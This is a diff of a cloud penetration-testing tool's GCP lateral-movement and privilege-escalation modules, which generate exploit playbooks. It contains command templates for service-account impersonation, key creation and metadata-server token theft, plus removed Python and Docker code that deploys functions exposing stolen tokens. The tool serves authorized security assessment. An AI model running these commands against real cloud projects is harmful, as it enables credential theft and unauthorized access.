make(map[string][]LateralMovementPath) + for _, path := range m.AllPaths { + byCategory[path.Category] = append(byCategory[path.Category], path) } - } else if len(orgPaths) > 0 { - logger.InfoM(fmt.Sprintf("Found %d organization-level lateral movement path(s)", len(orgPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) - for i := range orgPaths { - orgName := orgNames[orgPaths[i].ScopeID] - if orgName == "" { - orgName = orgPaths[i].ScopeID - } - // Update the path with org context - orgPaths[i].ScopeName = orgName - orgPaths[i].RiskLevel = "CRITICAL" // Org-level is critical - orgPaths[i].PathType = "lateral" - } - m.mu.Lock() - m.ProjectPaths["organization"] = append(m.ProjectPaths["organization"], orgPaths...) - m.mu.Unlock() - } - // Analyze folder-level IAM - folderPaths, folderNames, err := attackSvc.AnalyzeFolderAttackPaths(ctx, "lateral") - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, "Could not analyze folder-level lateral movement paths") - } - } else if len(folderPaths) > 0 { - logger.InfoM(fmt.Sprintf("Found %d folder-level lateral movement path(s)", len(folderPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) - for i := range folderPaths { - folderName := folderNames[folderPaths[i].ScopeID] - if folderName == "" { - folderName = folderPaths[i].ScopeID + for category, paths := range byCategory { + sb.WriteString(fmt.Sprintf("### %s\n\n", category)) + for _, path := range paths { + sb.WriteString(fmt.Sprintf("**%s → %s**\n", path.Source, path.Target)) + sb.WriteString(fmt.Sprintf("- Method: %s\n", path.Method)) + sb.WriteString(fmt.Sprintf("- Risk: %s\n", path.RiskLevel)) + sb.WriteString(fmt.Sprintf("- Description: %s\n\n", path.Description)) + if path.ExploitCommand != "" { + sb.WriteString("```bash\n") + sb.WriteString(path.ExploitCommand) + sb.WriteString("\n```\n\n") + } } - // Update the path with folder context - folderPaths[i].ScopeName = folderName - folderPaths[i].RiskLevel = "CRITICAL" // Folder-level is critical - folderPaths[i].PathType = "lateral" } - m.mu.Lock() - m.ProjectPaths["folder"] = append(m.ProjectPaths["folder"], folderPaths...) - m.mu.Unlock() } -} -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *LateralMovementModule) initializeLootForProject(projectID string) { - if m.LootMap[projectID] == nil { - m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["lateral-movement-commands"] = &internal.LootFile{ - Name: "lateral-movement-commands", - Contents: "# Lateral Movement Exploit Commands\n# Generated by CloudFox\n\n", + // Permission-based findings from FoxMapper + if len(m.FoxMapperFindings) > 0 { + sb.WriteString("## Permission-Based Lateral Movement Techniques\n\n") + for _, finding := range m.FoxMapperFindings { + sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Technique, finding.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", finding.Description)) + sb.WriteString(fmt.Sprintf("- Principals with access: %d\n\n", len(finding.Principals))) + if finding.Exploitation != "" { + sb.WriteString("```bash\n") + sb.WriteString(finding.Exploitation) + sb.WriteString("\n```\n\n") + } } } -} -func (m *LateralMovementModule) generatePlaybook() *internal.LootFile { - // Use centralized playbook generation from attackpathService return &internal.LootFile{ Name: "lateral-movement-playbook", - Contents: attackpathservice.GenerateLateralPlaybook(m.AllPaths, ""), + Contents: sb.String(), } } - func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) @@ -305,17 +254,14 @@ func (m *LateralMovementModule) processProject(ctx context.Context, projectID st // 2. Find token theft vectors (compute instances, functions, etc.) m.findTokenTheftVectors(ctx, projectID, logger) - - // 3. Find permission-based lateral movement paths - m.findPermissionBasedLateralPaths(ctx, projectID, logger) } // findImpersonationChains finds service account impersonation paths func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, projectID string, logger internal.Logger) { iamService := IAMService.New() - // Get all service accounts - serviceAccounts, err := iamService.ServiceAccounts(projectID) + // Get all service accounts (without keys - not needed for impersonation analysis) + serviceAccounts, err := iamService.ServiceAccountsBasic(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, @@ -323,7 +269,7 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro return } - // For each SA, check who can impersonate it using GetServiceAccountIAMPolicy + // For each SA, check who can impersonate it for _, sa := range serviceAccounts { impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) if err != nil { @@ -332,32 +278,26 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro // Token creators can impersonate for _, creator := range impersonationInfo.TokenCreators { - // Skip allUsers/allAuthenticatedUsers - those are handled separately if shared.IsPublicPrincipal(creator) { continue } riskLevel := "HIGH" - // If target SA has roles/owner or roles/editor, it's critical if impersonationInfo.RiskLevel == "CRITICAL" { riskLevel = "CRITICAL" } - path := attackpathservice.AttackPath{ - Principal: creator, - PrincipalType: shared.GetPrincipalType(creator), - Method: "Impersonate (Get Token)", - TargetResource: sa.Email, - Permissions: []string{"iam.serviceAccounts.getAccessToken"}, - Category: "Service Account Impersonation", - RiskLevel: riskLevel, - Description: fmt.Sprintf("%s can impersonate %s", creator, sa.Email), + path := LateralMovementPath{ + Source: creator, + SourceType: shared.GetPrincipalType(creator), + Target: sa.Email, + Method: "Impersonate (Get Token)", + Category: "Service Account Impersonation", + Permissions: []string{"iam.serviceAccounts.getAccessToken"}, + Description: fmt.Sprintf("%s can impersonate %s", creator, sa.Email), + RiskLevel: riskLevel, ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), - ProjectID: projectID, - ScopeType: "project", - ScopeID: projectID, - ScopeName: m.GetProjectName(projectID), - PathType: "lateral", + ProjectID: projectID, } m.mu.Lock() @@ -372,21 +312,17 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro continue } - path := attackpathservice.AttackPath{ - Principal: creator, - PrincipalType: shared.GetPrincipalType(creator), - Method: "Create Key", - TargetResource: sa.Email, - Permissions: []string{"iam.serviceAccountKeys.create"}, - Category: "Service Account Key Creation", - RiskLevel: "CRITICAL", - Description: fmt.Sprintf("%s can create keys for %s", creator, sa.Email), + path := LateralMovementPath{ + Source: creator, + SourceType: shared.GetPrincipalType(creator), + Target: sa.Email, + Method: "Create Key", + Category: "Service Account Key Creation", + Permissions: []string{"iam.serviceAccountKeys.create"}, + Description: fmt.Sprintf("%s can create keys for %s", creator, sa.Email), + RiskLevel: "CRITICAL", ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), - ProjectID: projectID, - ScopeType: "project", - ScopeID: projectID, - ScopeName: m.GetProjectName(projectID), - PathType: "lateral", + ProjectID: projectID, } m.mu.Lock() @@ -418,7 +354,6 @@ func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, instances, err := computeService.Instances(projectID) if err != nil { - // Don't count as error - API may not be enabled if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, fmt.Sprintf("Could not get compute instances in project %s", projectID)) @@ -427,34 +362,28 @@ func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, } for _, instance := range instances { - // Skip instances without service accounts if len(instance.ServiceAccounts) == 0 { continue } for _, sa := range instance.ServiceAccounts { - // Skip default compute SA if it has no useful scopes if sa.Email == "" { continue } - path := attackpathservice.AttackPath{ - Principal: instance.Name, - PrincipalType: "compute_instance", - Method: "Steal Token (Metadata)", - TargetResource: sa.Email, - Permissions: []string{"compute.instances.get", "compute.instances.osLogin"}, - Category: "Compute Instance Token Theft", - RiskLevel: "HIGH", - Description: fmt.Sprintf("Access to instance %s allows stealing token for %s", instance.Name, sa.Email), + path := LateralMovementPath{ + Source: instance.Name, + SourceType: "compute_instance", + Target: sa.Email, + Method: "Steal Token (Metadata)", + Category: "Compute Instance Token Theft", + Permissions: []string{"compute.instances.get", "compute.instances.osLogin"}, + Description: fmt.Sprintf("Access to instance %s allows stealing token for %s", instance.Name, sa.Email), + RiskLevel: "HIGH", ExploitCommand: fmt.Sprintf(`# SSH into instance and steal token gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"'`, instance.Name, instance.Zone, projectID), ProjectID: projectID, - ScopeType: "project", - ScopeID: projectID, - ScopeName: m.GetProjectName(projectID), - PathType: "lateral", } m.mu.Lock() @@ -483,81 +412,25 @@ func (m *LateralMovementModule) findCloudFunctionVectors(ctx context.Context, pr continue } - // Generate exploit with PoC code, deploy command, and invoke command - exploitCmd := fmt.Sprintf(`# Target: Cloud Function %s -# Service Account: %s -# Region: %s - -# Step 1: Create token exfiltration function code -mkdir -p /tmp/token-theft-%s && cd /tmp/token-theft-%s - -cat > main.py << 'PYEOF' -import functions_framework -import requests - -@functions_framework.http -def steal_token(request): - # Fetch SA token from metadata server - token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" - headers = {"Metadata-Flavor": "Google"} - resp = requests.get(token_url, headers=headers) - token_data = resp.json() - - # Fetch SA email - email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" - email_resp = requests.get(email_url, headers=headers) - - return { - "service_account": email_resp.text, - "access_token": token_data.get("access_token"), - "token_type": token_data.get("token_type"), - "expires_in": token_data.get("expires_in") - } -PYEOF - -cat > requirements.txt << 'REQEOF' -functions-framework==3.* -requests==2.* -REQEOF - -# Step 2: Deploy function with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs) + exploitCmd := fmt.Sprintf(`# Deploy function with target SA to steal token +# Requires: cloudfunctions.functions.create + iam.serviceAccounts.actAs gcloud functions deploy token-theft-poc \ - --gen2 \ - --runtime=python311 \ - --region=%s \ - --source=. \ - --entry-point=steal_token \ - --trigger-http \ - --allow-unauthenticated \ - --service-account=%s \ - --project=%s - -# Step 3: Invoke function to get token -curl -s $(gcloud functions describe token-theft-poc --region=%s --project=%s --format='value(url)') - -# Cleanup -gcloud functions delete token-theft-poc --region=%s --project=%s --quiet`, - fn.Name, fn.ServiceAccount, fn.Region, - fn.Name, fn.Name, - fn.Region, fn.ServiceAccount, projectID, - fn.Region, projectID, - fn.Region, projectID) - - path := attackpathservice.AttackPath{ - Principal: fn.Name, - PrincipalType: "cloud_function", - Method: "Steal Token (Function)", - TargetResource: fn.ServiceAccount, - Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, - Category: "Cloud Function Token Theft", - RiskLevel: "HIGH", - Description: fmt.Sprintf("Cloud Function %s runs with SA %s", fn.Name, fn.ServiceAccount), + --gen2 --runtime=python311 --region=%s \ + --entry-point=steal_token --trigger-http --allow-unauthenticated \ + --service-account=%s --project=%s`, + fn.Region, fn.ServiceAccount, projectID) + + path := LateralMovementPath{ + Source: fn.Name, + SourceType: "cloud_function", + Target: fn.ServiceAccount, + Method: "Steal Token (Function)", + Category: "Cloud Function Token Theft", + Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, + Description: fmt.Sprintf("Cloud Function %s runs with SA %s", fn.Name, fn.ServiceAccount), + RiskLevel: "HIGH", ExploitCommand: exploitCmd, - ProjectID: projectID, - ScopeType: "project", - ScopeID: projectID, - ScopeName: m.GetProjectName(projectID), - PathType: "lateral", + ProjectID: projectID, } m.mu.Lock() @@ -585,99 +458,25 @@ func (m *LateralMovementModule) findCloudRunVectors(ctx context.Context, project continue } - // Generate exploit with PoC code, deploy command, and invoke command - exploitCmd := fmt.Sprintf(`# Target: Cloud Run Service %s -# Service Account: %s -# Region: %s - -# Step 1: Create token exfiltration container -mkdir -p /tmp/cloudrun-theft-%s && cd /tmp/cloudrun-theft-%s - -cat > main.py << 'PYEOF' -from flask import Flask, jsonify -import requests -import os - -app = Flask(__name__) - -@app.route("/") -def steal_token(): - # Fetch SA token from metadata server - token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" - headers = {"Metadata-Flavor": "Google"} - resp = requests.get(token_url, headers=headers) - token_data = resp.json() - - # Fetch SA email - email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" - email_resp = requests.get(email_url, headers=headers) - - return jsonify({ - "service_account": email_resp.text, - "access_token": token_data.get("access_token"), - "token_type": token_data.get("token_type"), - "expires_in": token_data.get("expires_in") - }) - -if __name__ == "__main__": - app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) -PYEOF - -cat > requirements.txt << 'REQEOF' -flask==3.* -requests==2.* -gunicorn==21.* -REQEOF - -cat > Dockerfile << 'DOCKEOF' -FROM python:3.11-slim -WORKDIR /app -COPY requirements.txt . -RUN pip install --no-cache-dir -r requirements.txt -COPY main.py . -CMD exec gunicorn --bind :$PORT --workers 1 --threads 8 --timeout 0 main:app -DOCKEOF - -# Step 2: Build and push container -gcloud builds submit --tag gcr.io/%s/token-theft-poc --project=%s - -# Step 3: Deploy Cloud Run service with target SA (requires run.services.create + iam.serviceAccounts.actAs) + exploitCmd := fmt.Sprintf(`# Deploy Cloud Run service with target SA to steal token +# Requires: run.services.create + iam.serviceAccounts.actAs gcloud run deploy token-theft-poc \ --image gcr.io/%s/token-theft-poc \ - --region=%s \ - --service-account=%s \ - --allow-unauthenticated \ - --project=%s - -# Step 4: Invoke service to get token -curl -s $(gcloud run services describe token-theft-poc --region=%s --project=%s --format='value(status.url)') - -# Cleanup -gcloud run services delete token-theft-poc --region=%s --project=%s --quiet -gcloud container images delete gcr.io/%s/token-theft-poc --quiet --force-delete-tags`, - svc.Name, svc.ServiceAccount, svc.Region, - svc.Name, svc.Name, - projectID, projectID, - projectID, svc.Region, svc.ServiceAccount, projectID, - svc.Region, projectID, - svc.Region, projectID, - projectID) - - path := attackpathservice.AttackPath{ - Principal: svc.Name, - PrincipalType: "cloud_run", - Method: "Steal Token (Container)", - TargetResource: svc.ServiceAccount, - Permissions: []string{"run.services.create", "iam.serviceAccounts.actAs"}, - Category: "Cloud Run Token Theft", - RiskLevel: "HIGH", - Description: fmt.Sprintf("Cloud Run service %s runs with SA %s", svc.Name, svc.ServiceAccount), + --region=%s --service-account=%s \ + --allow-unauthenticated --project=%s`, + projectID, svc.Region, svc.ServiceAccount, projectID) + + path := LateralMovementPath{ + Source: svc.Name, + SourceType: "cloud_run", + Target: svc.ServiceAccount, + Method: "Steal Token (Container)", + Category: "Cloud Run Token Theft", + Permissions: []string{"run.services.create", "iam.serviceAccounts.actAs"}, + Description: fmt.Sprintf("Cloud Run service %s runs with SA %s", svc.Name, svc.ServiceAccount), + RiskLevel: "HIGH", ExploitCommand: exploitCmd, - ProjectID: projectID, - ScopeType: "project", - ScopeID: projectID, - ScopeName: m.GetProjectName(projectID), - PathType: "lateral", + ProjectID: projectID, } m.mu.Lock() @@ -701,44 +500,36 @@ func (m *LateralMovementModule) findGKEVectors(ctx context.Context, projectID st } // Track cluster SAs to avoid duplicates in node pools - clusterSAs := make(map[string]string) // clusterName -> SA + clusterSAs := make(map[string]string) for _, cluster := range clusters { - // Check node service account if cluster.NodeServiceAccount != "" { clusterSAs[cluster.Name] = cluster.NodeServiceAccount var exploitCmd string if cluster.WorkloadIdentity != "" { exploitCmd = fmt.Sprintf(`# Cluster uses Workload Identity - tokens are pod-specific -# Get credentials for cluster: gcloud container clusters get-credentials %s --location=%s --project=%s -# Then exec into a pod and check for mounted SA token: kubectl exec -it -- cat /var/run/secrets/kubernetes.io/serviceaccount/token`, cluster.Name, cluster.Location, projectID) } else { - exploitCmd = fmt.Sprintf(`# Cluster uses node SA (no Workload Identity) - all pods can access node SA + exploitCmd = fmt.Sprintf(`# Cluster uses node SA - all pods can access node SA gcloud container clusters get-credentials %s --location=%s --project=%s -# Exec into any pod and steal node SA token: kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, cluster.Name, cluster.Location, projectID) } - path := attackpathservice.AttackPath{ - Principal: cluster.Name, - PrincipalType: "gke_cluster", - Method: "Steal Token (Pod)", - TargetResource: cluster.NodeServiceAccount, - Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, - Category: "GKE Cluster Token Theft", - RiskLevel: "HIGH", - Description: fmt.Sprintf("GKE cluster %s uses node SA %s", cluster.Name, cluster.NodeServiceAccount), + path := LateralMovementPath{ + Source: cluster.Name, + SourceType: "gke_cluster", + Target: cluster.NodeServiceAccount, + Method: "Steal Token (Pod)", + Category: "GKE Cluster Token Theft", + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Description: fmt.Sprintf("GKE cluster %s uses node SA %s", cluster.Name, cluster.NodeServiceAccount), + RiskLevel: "HIGH", ExploitCommand: exploitCmd, - ProjectID: projectID, - ScopeType: "project", - ScopeID: projectID, - ScopeName: m.GetProjectName(projectID), - PathType: "lateral", + ProjectID: projectID, } m.mu.Lock() @@ -752,7 +543,7 @@ kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata. for _, np := range nodePools { clusterSA := clusterSAs[np.ClusterName] if np.ServiceAccount == "" || np.ServiceAccount == clusterSA { - continue // Skip if same as cluster SA or empty + continue } exploitCmd := fmt.Sprintf(`# Node pool %s uses specific SA @@ -760,21 +551,17 @@ gcloud container clusters get-credentials %s --location=%s --project=%s # Exec into pod running on this node pool and steal token`, np.Name, np.ClusterName, np.Location, projectID) - path := attackpathservice.AttackPath{ - Principal: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), - PrincipalType: "gke_nodepool", - Method: "Steal Token (Pod)", - TargetResource: np.ServiceAccount, - Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, - Category: "GKE Node Pool Token Theft", - RiskLevel: "HIGH", - Description: fmt.Sprintf("GKE node pool %s/%s uses SA %s", np.ClusterName, np.Name, np.ServiceAccount), + path := LateralMovementPath{ + Source: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), + SourceType: "gke_nodepool", + Target: np.ServiceAccount, + Method: "Steal Token (Pod)", + Category: "GKE Node Pool Token Theft", + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Description: fmt.Sprintf("GKE node pool %s/%s uses SA %s", np.ClusterName, np.Name, np.ServiceAccount), + RiskLevel: "HIGH", ExploitCommand: exploitCmd, - ProjectID: projectID, - ScopeType: "project", - ScopeID: projectID, - ScopeName: m.GetProjectName(projectID), - PathType: "lateral", + ProjectID: projectID, } m.mu.Lock() @@ -784,43 +571,10 @@ gcloud container clusters get-credentials %s --location=%s --project=%s } } -// findPermissionBasedLateralPaths identifies principals with lateral movement permissions -// This uses the centralized attackpathService for project and resource-level analysis -func (m *LateralMovementModule) findPermissionBasedLateralPaths(ctx context.Context, projectID string, logger internal.Logger) { - // Use attackpathService for project-level analysis - attackSvc := attackpathservice.New() - - projectName := m.GetProjectName(projectID) - paths, err := attackSvc.AnalyzeProjectAttackPaths(ctx, projectID, projectName, "lateral") - if err != nil { - gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, - fmt.Sprintf("Could not analyze lateral movement permissions for project %s", projectID)) - return - } - - // Store paths directly (they're already AttackPath type) - m.mu.Lock() - m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], paths...) - m.mu.Unlock() - - // Also analyze resource-level IAM - resourcePaths, err := attackSvc.AnalyzeResourceAttackPaths(ctx, projectID, "lateral") - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, - fmt.Sprintf("Could not analyze resource-level lateral movement permissions for project %s", projectID)) - } - } else { - m.mu.Lock() - m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], resourcePaths...) - m.mu.Unlock() - } -} - // ------------------------------ // Loot File Management // ------------------------------ -func (m *LateralMovementModule) addPathToLoot(path attackpathservice.AttackPath, projectID string) { +func (m *LateralMovementModule) addPathToLoot(path LateralMovementPath, projectID string) { lootFile := m.LootMap[projectID]["lateral-movement-commands"] if lootFile == nil { return @@ -828,14 +582,14 @@ func (m *LateralMovementModule) addPathToLoot(path attackpathservice.AttackPath, lootFile.Contents += fmt.Sprintf( "# Method: %s\n"+ "# Category: %s\n"+ - "# Principal: %s (%s)\n"+ + "# Source: %s (%s)\n"+ "# Target: %s\n"+ "# Permissions: %s\n"+ "%s\n\n", path.Method, path.Category, - path.Principal, path.PrincipalType, - path.TargetResource, + path.Source, path.SourceType, + path.Target, strings.Join(path.Permissions, ", "), path.ExploitCommand, ) @@ -856,44 +610,49 @@ func (m *LateralMovementModule) getHeader() []string { return []string{ "Project", "Source", - "Principal Type", - "Principal", + "Source Type", + "Target", "Method", - "Target Resource", "Category", - "Binding Scope", - "Permissions", + "Risk Level", } } -func (m *LateralMovementModule) pathsToTableBody(paths []attackpathservice.AttackPath) [][]string { +func (m *LateralMovementModule) getFoxMapperHeader() []string { + return []string{ + "Technique", + "Category", + "Permission", + "Description", + "Principal Count", + } +} + +func (m *LateralMovementModule) pathsToTableBody(paths []LateralMovementPath) [][]string { var body [][]string for _, path := range paths { - scopeName := path.ScopeName - if scopeName == "" { - scopeName = path.ScopeID - } - - // Format binding scope (where the IAM binding is defined) - bindingScope := "Project" - if path.ScopeType == "organization" { - bindingScope = "Organization" - } else if path.ScopeType == "folder" { - bindingScope = "Folder" - } else if path.ScopeType == "resource" { - bindingScope = "Resource" - } - body = append(body, []string{ - scopeName, - path.ScopeType, - path.PrincipalType, - path.Principal, + m.GetProjectName(path.ProjectID), + path.Source, + path.SourceType, + path.Target, path.Method, - path.TargetResource, path.Category, - bindingScope, - strings.Join(path.Permissions, ", "), + path.RiskLevel, + }) + } + return body +} + +func (m *LateralMovementModule) foxMapperFindingsToTableBody() [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + body = append(body, []string{ + f.Technique, + f.Category, + f.Permission, + f.Description, + fmt.Sprintf("%d", len(f.Principals)), }) } return body @@ -921,8 +680,10 @@ func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, log // Generate playbook once for all projects playbook := m.generatePlaybook() + playbookAdded := false - for projectID := range m.ProjectPaths { + // Iterate over ALL projects, not just ones with enumerated paths + for _, projectID := range m.ProjectIDs { tableFiles := m.buildTablesForProject(projectID) var lootFiles []internal.LootFile @@ -934,12 +695,25 @@ func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, log } } - // Add playbook to first project only (to avoid duplication) - if playbook != nil && playbook.Contents != "" && len(outputData.ProjectLevelData) == 0 { + // Add playbook to first project only + if playbook != nil && playbook.Contents != "" && !playbookAdded { lootFiles = append(lootFiles, *playbook) + playbookAdded = true } - outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} + // Add FoxMapper findings table to first project only + if len(m.FoxMapperFindings) > 0 && projectID == m.ProjectIDs[0] { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "lateral-movement-permissions", + Header: m.getFoxMapperHeader(), + Body: m.foxMapperFindingsToTableBody(), + }) + } + + // Only add to output if we have tables or loot + if len(tableFiles) > 0 || len(lootFiles) > 0 { + outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} + } } pathBuilder := m.BuildPathBuilder() @@ -961,6 +735,14 @@ func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger inte }) } + if len(m.FoxMapperFindings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-movement-permissions", + Header: m.getFoxMapperHeader(), + Body: m.foxMapperFindingsToTableBody(), + }) + } + // Collect loot files var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index c87111ac..02329849 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -34,7 +34,7 @@ type NotebooksModule struct { ProjectInstances map[string][]notebooksservice.NotebookInstanceInfo // projectID -> instances ProjectRuntimes map[string][]notebooksservice.RuntimeInfo // projectID -> runtimes LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper attack path analysis results mu sync.Mutex } @@ -62,8 +62,8 @@ func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { } func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) @@ -238,9 +238,9 @@ func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.Note // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(sa) + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) } else { attackPaths = "No" } @@ -293,9 +293,9 @@ func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.Runtim // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "-" && sa != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(sa) + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) } else { attackPaths = "No" } diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 29e9fc8d..f0454026 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -6,7 +6,7 @@ import ( "strings" "sync" - attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -17,74 +17,38 @@ var GCPPrivescCommand = &cobra.Command{ Use: globals.GCP_PRIVESC_MODULE_NAME, Aliases: []string{"pe", "escalate", "priv"}, Short: "Identify privilege escalation paths in GCP organizations, folders, and projects", - Long: `Analyze GCP IAM policies to identify privilege escalation opportunities. - -This module examines IAM bindings at organization, folder, project, and resource levels -to find principals with dangerous permissions that could be used to escalate -privileges within the GCP environment. - -Detected privilege escalation methods (60+) include: - -Service Account Abuse: -- Token Creation (getAccessToken, getOpenIdToken) -- Key Creation (serviceAccountKeys.create, hmacKeys.create) -- Implicit Delegation, SignBlob, SignJwt -- Workload Identity Federation (external identity impersonation) - -IAM Policy Modification: -- Project/Folder/Org IAM Policy Modification -- Service Account IAM Policy + SA Creation combo -- Custom Role Create/Update (iam.roles.create/update) -- Org Policy Modification (orgpolicy.policy.set) -- Resource-specific IAM (Pub/Sub, BigQuery, Artifact Registry, Compute, KMS, Source Repos) - -Compute & Serverless: -- Compute Instance Metadata Injection (SSH keys, startup scripts) -- Create GCE Instance with privileged SA -- Cloud Functions Create/Update with SA Identity -- Cloud Run Services/Jobs Create/Update with SA Identity -- App Engine Deploy with SA Identity -- Cloud Build SA Abuse - -AI/ML: -- Vertex AI Custom Jobs with SA -- Vertex AI Notebooks with SA -- AI Platform Jobs with SA - -Data Processing & Orchestration: -- Dataproc Cluster Create / Job Submit -- Cloud Composer Environment Create/Update -- Dataflow Job Create -- Cloud Workflows with SA -- Eventarc Triggers with SA - -Scheduling & Tasks: -- Cloud Scheduler HTTP Request with SA -- Cloud Tasks with SA - -Other: -- Deployment Manager Deployment -- GKE Cluster Access, Pod Exec, Secrets -- Secret Manager Access -- KMS Key Access / Decrypt -- API Key Creation/Listing`, + Long: `Analyze FoxMapper graph data to identify privilege escalation opportunities. + +This module uses FoxMapper's graph-based analysis to find principals with paths +to admin-level access within the GCP environment. + +Prerequisites: +- Run 'foxmapper gcp graph create' first to generate the graph data + +Features: +- Identifies principals with privilege escalation paths to admin +- Shows shortest paths to organization, folder, and project admins +- Detects scope-limited paths (OAuth scope restrictions) +- Generates exploitation playbooks + +Detected privilege escalation vectors include: +- Service Account Token Creation (getAccessToken, getOpenIdToken) +- Service Account Key Creation (serviceAccountKeys.create) +- IAM Policy Modification (setIamPolicy) +- Compute Instance Creation with privileged SA +- Cloud Functions/Run deployment with SA +- And 60+ more techniques + +Run 'foxmapper gcp graph create' to generate the graph, then use this module.`, Run: runGCPPrivescCommand, } type PrivescModule struct { gcpinternal.BaseGCPModule - // All paths from combined analysis - AllPaths []attackpathservice.AttackPath - OrgPaths []attackpathservice.AttackPath - FolderPaths []attackpathservice.AttackPath - ProjectPaths map[string][]attackpathservice.AttackPath // projectID -> paths - ResourcePaths []attackpathservice.AttackPath - - // Org/folder info - OrgIDs []string - OrgNames map[string]string - FolderNames map[string]string + // FoxMapper data + FoxMapperCache *gcpinternal.FoxMapperCache + Findings []foxmapperservice.PrivescFinding // Loot LootMap map[string]*internal.LootFile @@ -107,99 +71,75 